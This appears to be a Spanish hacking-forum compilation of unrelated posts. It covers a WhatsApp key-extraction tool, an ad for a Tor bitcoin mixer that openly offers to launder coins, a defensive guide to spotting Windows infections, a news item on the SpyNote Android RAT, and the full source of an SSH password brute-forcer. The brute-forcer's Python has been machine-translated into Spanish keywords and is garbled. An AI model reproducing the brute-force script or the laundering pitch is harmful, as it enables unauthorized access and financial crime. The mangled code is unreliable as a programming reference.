Whatspp KeyDB Extractor

DB Extractor

WhatsApp Key/DB Extractor

Permite a los usuarios de WhatsApp extraer su clave de cifrado y sus bases de datos en dispositivos Android no enraizados.

PRERREQUISITOS:

O / S: Windows Vista, Windows 7, Windows 8, Windows 10, Mac OS X o Linux
Java - Si no está instalado: https://www.java.com/es/download/
Controladores ADB (Android Debug Bridge)
Debugging USB debe estar habilitado en el dispositivo de destino. Configuración -> Opciones del desarrollador -> (Depuración) Depuración USB
Si no puede encontrar las Opciones del programador, vaya a: Configuración -> Acerca del teléfono / dispositivo y toque el número de construcción
Varias veces hasta que finalmente se declare un desarrollador.
Dispositivo Android con Android 4.0 o superior. ES DECIR. Sandwich de helado, Jelly Bean, KitKat, Lollipop, melcocha o turrón.
INSTRUCCIONES:

Extraiga "WhatsApp-Key-DB-Extractor-master.zip" manteniendo la estructura de directorios.
Haga clic en "WhatsAppKeyDBExtract.bat"(Windows) o "WhatsAppKeyDBExtract.sh" (Mac OS X / Linux).
Conecte su dispositivo a través de USB, desbloquee la pantalla y espere a que aparezca "Copia de seguridad completa".
Ingrese su contraseña de respaldo o deje en blanco (si no está establecido) y toque en "Copia de seguridad de mis datos".
Confirme la contraseña de copia de seguridad en la consola de comandos y, a continuación, compruebe su carpeta "extraída".

Descargar: https://github.com/EliteAndroidApps/WhatsApp-Key-DB-Extractor

By LosPerrosDelmAL
La imagen puede contener: teléfono y pantalla

Bitcoin







Hiden wallet Deep Web BTC
Su cartera anónimo en el lado oscuro de internet.
la seguridad bancaria grado para su Bitcoin.
la seguridad del almacenamiento en frío con facilidad en línea.
Monedero oculto no puede acceder a sus claves o Bitcoin.
Cada vez que transfiera bitcoins a su cartera Ocultos, se mezclan para mayor seguridad.
Bitcoin y Tor, un equipo perfecto:
Cuando se utiliza junto con Bitcoin Tor está combinando el mejor de divisas en línea con la mejor tecnología de encriptación y privacidad disponibles.
Cuando se está utilizando sitios web normales de Internet para administrar sus fondos de Bitcoin no se puede saber quién te está trazando.
Sólo una cartera web compartido en Tor le proporcionará el máximo anonimato y la privacidad.
Bitcoin libre:
Lavar sus bitcoins gratis, todo lo que carga es la tarifa de la red de 0,001 BTC que pagar en su totalidad a la red.
Para mezclar sus bitcoins lo mejor es utilizar un servicio oculto Tor como Monedero oculto porque mezcladores operativos clearweb como BitcoinFog están sujetas al control del gobierno.

La imagen puede contener: texto


Cómo comprobar si un equipo Windows está infectado rápidamente y sin herramientas adicionales
Recientemente leía una entrada de un instructor de SANS con amplia experiencia en respuesta ante incidentes que propone una breve lista de acciones para determinar rápidamente si un equipo Windows está infectado, sin necesidad de instalar un software de terceros, simplemente desde la linea de comandos. Obviamente y como dice su autor no es un método infalible pero si es verdad que ayudará a detectar muchas infecciones de una manera rápida y eficiente.

Elementos de inicio mediante WMIC

Windows incorpora una herramienta muy potente que seguro que conocéis: WMIC que, entre otras cosas, puede mostrar los elementos que se ejecutan al inicio para una posterior investigación. Sólo tienes que abrir la consola y escribir 'wmic startup list full'.

Como se muestra en el ejemplo es fácil identificar un programa que se ejecuta en el directorio Local\Temp, para luego subir el hash sospechoso a malwr.com o VirusTotal.Caché DNS

Ahora si escribes 'ipconfig /displaydns' se mostrarán los dominios que se han resuelto recientemente. Si ves algo extraño es recomendable buscar el nombre de dominio y la IP en VirusTotal o similar para determinar si es malicioso.
Lista de procesos con WMIC

De nuevo usamos WMIC, esta vez con 'wmic process list full | more' o, si quieres una salida más compacta, aunque con un comando más largo de escribir:

wmic process get description,processid,parentprocessid,commandline /format:csv

Busca cosas que se ejecutan en lugares extraños o nombres de procesos maliciosos/aleatorios/extraños.

Lista de servicios con WMIC

Esto puede ser más difícil si no sabemos lo que estamos viendo, pero es fácil de comprobar y a menudo el malware todavía se encuentra fácilmente por el nombre de la ruta de acceso o exe. El formato es el mismo que otros, o puedes ser más específico con la versión "get".

wmic service list full | more

o

wmic service get name,processid,startmode,state,status,pathname /format:csv

A continuación se muestra un terminal de ejemplo que muestra sólo el nombre del servicio y la ruta:


Lista de jobs de WMIC

Con éste es menos probable encontrar algo porque la mayor parte del malware no utiliza jobs, pero algunos como MPlug lo hacen, y una vez más es bastante fácil de comprobar. Simplemente ejecuta 'wmic job list full', Probablemente recibas una respuesta del tipo 'Instance(s) Available' lo que significa que no hay tareas programadas.

Prefetch de Windows

Es posible que esta característica no esté activada si tienes un SSD, pero si lo está, tendrás una lista con los últimos 128 ejecutables ejecutados (valga la redundancia). Comprueba los nombres de los archivos ".pf" en la carpeta C:\Windows\Prefetch. Los nombres de cada archivo .pf se crean a partir del nombre del archivo ejecutable más un hash de la ruta donde se ejecutó. Estos archivos también almacenan el número de ejecución y las fechas en que fueron ejecutados la primera y última vez, aunque extraer esta información puede requerir herramientas adicionales. Si quieres más info de prefetch visita:
http://www.hexacorn.com/blog/2012/06/13/prefetch-hash-calculator-a-hash-lookup-table-xpvistaw7w2k3w2k8/

Netstat

No olvidamos lo básico, aunque la info que muestra necesita de cierta búsqueda para descubrir si la IP es de Google o stealyourbanknumber.su. Normalmente ejecuta 'Netstat -abno' y busca también números de puertos extraños con conexiones sitios externos, 25, 8080, 6667, etc.

Los parámetros netstat son:

-a Muestra todas las conexiones y puertos a la escucha.
-b Muestra el ejecutable implicado en la creación de cada conexión o puerto de escucha.
-n Muestra las direcciones y los números de puerto en forma numérica.
-o Muestra el ID de proceso propietario asociado a cada conexión.

Versión en batch

¿Qué tienes que hacer estas comprobaciones de forma rutinaria? Pues lo mejor es hacerse un archivo por lotes y alimentarlo con el argumento de nombre de host. Incluso se puede utilizar a través de una red dando los permisos adecuados en los otros equipos para una fácil evaluación remota. El siguiente script tiene como salida un informe HTML bastante decente incluyendo además información sobre el equipo evaluado:
compartido del foro http://www.hackplayer.com

Scanner SSH puerto 22

importación hilo
importación tiempo
de roscar importación Tema
importación sys , os , threading , tiempo , rastreo , getopt
importación paramiko
importación de terminales

mundial ADX
mundial puerto

ADX = "1"
puerto = 22
datos = []
i = []

plazo = terminales . TerminalController ()
paramiko . util . log_to_file ( 'demo.log' )

print "\ n *************************************"
print "*" + término . ROJO + "SSH Bruteforcer Ver. 0.6" + término . NORMAL + "*"
print "* Codificado por Christian Martorella *"
print "* Edge-Security Research *"
print "*cmartorella@edge-security.com *"
print "************************************* \ n"

def uso ():
    impresión "de uso: brutessh.py opciones \ n"
    print "-h: host de destino"
    print "-u: nombre de usuario a la fuerza"
    print "-d: archivo de contraseñas"
    impresión "-t: hilos (por defecto 12, más podría ser malo)"
    print "-p: puerto de destino \ n"
    print "Ejemplo: 192.168.1.55 brutessh.py -h -u root mypasswordlist.txt -d \ n"
    sys . de salida ()

clase vigor ( Tema ):
        def __init__ ( self , nombre , num ):
                Tema . __init__ ( auto )
                auto . nombre = nombre
                auto . num = str ( num )

        def run ( auto ):
                mundial ADX
                si ADX == "1" :
                        passw = auto . nombre . división ( "\ n" ) [ 0 ]
                        impresión plazo . BOL + término . UP + término . CLEAR_EOL + auto . num + "/" + str ( totaldict ) + "" + PASSW + término . NORMAL
                        t = paramiko . Transporte ( nombre de host )
                        tratar :
                                t . start_client ()
                        salvo excepciones :
                                x = 0

                        tratar :
                                t . AUTH_PASSWORD ( nombre de usuario = nombre de usuario , contraseña = passw )
                        salvo excepciones :
                                x = 0

                        si t . is_authenticated ():
                                impresión plazo . ABAJO + término . GREEN + "\ Nauth SÍ ---> Contraseña Encontrados:" + PASSW + término . ABAJO + término . NORMAL
                                t . cerrar ()
                                ADX = "0"
                                sys . de salida ()
                        otra cosa :
                                t . cerrar ()
                tiempo . dormir ( 0 )
                i [ 0 ] = i [ 0 ] - 1


def test_thread ( nombres ):
        i . append ( 0 )
        j = 0
        mientras que len ( nombres ):
                tratar :
                        si i [ 0 ] < º :
                                n = nombres . pop ( 0 )
                                i [ 0 ] = i [ 0 ] + 1
                                hilo = fuerza ( n , j )
                                hilo . iniciar ()
                                j = j + 1
                excepto KeyboardInterrupt :
                        print "Ataque suspendida por usuario .. \ n"
                        sys . de salida ()
        hilo . unirse ()

def prueba ( argv ):
        mundial ª
        mundial nombre de host
        mundial nombre de usuario
        mundial totaldict
        º = 12
        si len ( sys . argv ) < 3 :
                el uso de ()
        tratar :
                opta , args = getopt . getopt ( argv , "h: u: d: t: t:" )
        excepto getopt . GetoptError :
                el uso de ()
        para opt , arg en opta :
                si opt == '-u' :
                        username = arg
                elif optar == '-h' :
                        nombre de host = arg
                elif optar == '-d' :
                        password = arg
                elif optar == "-t" :
                        º = arg
                elif optar == "-p" :
                        puerto = arg
        tratar :
                f = abierto ( contraseña , "r" )
        excepto :
                print "No se puede abrir archivo de contraseñas \ n"
                sys . de salida ()
        impresión plazo . ROJO + "Anfitrión:" + término . NORMAL +  nombre de host + término . ROJO
        print "Nombre de usuario:" + término . NORMAL +  nombre de usuario + término . ROJO
        print "archivo de contraseña:" + término . NORMAL + contraseña
        imprimir "================================================ ========= "
        print "password Tratando ... \ n"
        nombre = f . readlines ()
        totaldict = len ( nombre )
        starttime = tiempo . reloj ()
        test_thread ( nombre )
        tiempo de parada = tiempo . reloj ()
        print "\ nTimes -> Init:" + str ( starttime ) + "End:" + str ( hora de detención )
        print "\ n"
       
si __name__ == "__main__" :
        tratar :
                prueba ( sys . argv [ 1 :])
        excepto KeyboardInterrupt :
                print "Ataque suspendida por usuario ... \ n"
                sys . de salida ()

Troyano RAT para Android

Cada vez es más habitual utilizar nuestro dispositivo móvil para todo tipo de acciones y guardar en ellos todo tipo de archivos, incluso personales y confidenciales. Por ello, estos dispositivos son cada vez objetivos más interesantes para los piratas informáticos, quienes buscan vulnerabilidades para explotar los dispositivos y hacerse con el control de ellos y desarrollan nuevas y peligrosas herramientas de software malicioso que les permitan tomar el control total de los mismos de forma remota, como es el caso del nuevo troyano RAT SpyNote.

Recientemente, en varios foros sobre seguridad informática se ha publicado un compilador de lo que puede ser un nuevo troyano RAT para Android. Analizando este compilador, los expertos de seguridad han descubierto una gran similitud con otras variantes similares como Om. y DroidJack y, según la actividad de los foros de la Deep Web, es posible que esta nueva amenaza esté lista para empezar a distribuirse a nivel mundial en cualquier 

Además de todas sus funciones anteriores, una de las características más relevantes es que es capaz de funcionar sin restricciones incluso en dispositivos sin root.



Ninguna de las funciones de SpyNote necesita root

Hasta ahora, muchos troyanos similares necesitaban tener permisos de root para funcionar, lo que limitaba su radio de acción u obligaba a los piratas informáticos a incluir en ellos exploits que le permitieran conseguir dichos permisos aprovechando vulnerabilidades como las de los procesadores Qualcomm. Sin embargo, SpyNote no necesita en ningún momento permisos de root para desatar todo su potencial, aunque a cambio de eso tendrá que pedir al usuario un gran número de permisos, lo que debería levantar sospechas.
La última versión 2 de SpyNote cuenta con un compilador que permite a los piratas informáticos montar su propia versión del troyano y redirigir todo el tráfico a su propio servidor de control, sin embargo, por el momento no se sabe si este troyano se distribuirá por la red como una herramienta abierta o si los piratas informáticos intentarán venderlo a los usuarios interesados, incluso no sería descabellado ver un modelo de negocio MaaS (Malware as a Service) donde los piratas informáticos alquilen el acceso al servidor C&C al mejor postor.
¿Crees que estamos ante una grave amenaza para la seguridad de Android?
esto fue compartido por los servidores https://www.redeszone.net   y si no comprender le hago el video cuando no encuentre nada que hacer